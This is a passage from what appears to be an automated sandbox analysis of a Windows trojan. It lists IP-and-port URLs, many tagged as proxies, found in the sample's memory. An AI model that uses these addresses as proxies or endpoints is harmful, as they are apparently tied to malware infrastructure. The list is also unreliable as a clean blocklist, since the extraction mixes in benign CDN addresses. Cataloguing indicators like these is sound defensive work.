                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7069000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.72.79.65:45872://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD2A8000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1F3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.73.158.115:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.73.158.115:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.74.229.133:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.74.229.133:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.74.229.133:8080x
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.75.117.79
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.75.117.79://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.104.30:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.104.30:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.148.92:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.148.92:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.172.230:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.172.230:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CC152000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.190.37:31756
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.190.37:31756://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.253.66:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.76.253.66:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.0.44:3129
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.0.44:3129://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.170.13:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB125000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.170.13:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.171.10:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.171.10:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7860000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD07F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.210.178:30000
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBA06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.210.178:30000://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.25.99:3128
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.25.99:3128://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.54.10:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.54.10:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8280000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C82C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.96.146:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C847F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.78.96.146:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7D8B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.79.96.145:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.79.96.145:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.79.96.193:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6CAB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.79.96.193:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.8.59.1:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.8.59.1:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.237.10:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.237.10:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CD1CE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.77.1:443
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6756000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.77.1:443://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.77.252:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.80.77.252:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.117.225:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.117.225:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.152.10:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.152.10:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C68A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.152.58:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.152.58:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.212.192:83
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.81.212.192:83://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.157.102:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.82.157.102:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.0.46:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.0.46:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C64DA000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.178.42:8181
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6480000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.178.42:8181://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.179.78:2016
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.179.78:2016://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6772000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.232.122
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.232.122://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.83.232.122:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.134.1:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.134.1:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.134.9:1080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.134.9:1080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.27:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAE42000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.27:8083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C760E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.30:8083
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.84.177.30:8083://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.25:4145
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.86.1.25:4145://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DCC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.87.170.239:32650
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C8DD1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.87.170.239:32650://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAA57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.9.188.138:52269
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CAAC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.9.188.138:52269://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7981000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.91.82.177:8080
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBB63000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.91.82.177:8080://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.94.133.93:4153
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.94.133.93:4153://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC4B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.98.36:1088
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBC16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.95.98.36:1088://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://103.96.38.161:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.128.103.32:64312
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C715C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.128.103.32:64312://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBE7B000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.129.199.34:8800
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CBDF0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.129.199.34:8800://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C7708000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.104.12://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C9FF6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.106:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.142:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146://proxyxD
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C677C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.146:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.15:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCC47000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.182:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6F32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.198:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C854A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.105.207:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C6712000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CCD0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.154:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.234:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CB377000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.106.65:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.142
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.142://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194CA2DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.142:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.206
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.206://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C76F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.107.206:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149://proxy
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149:80
                      Source: SecuriteInfo.com.Win64.TrojanX-gen.24429.31258.exe, 00000000.00000002.1796025652.00000194C95F6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://104.16.108.149x
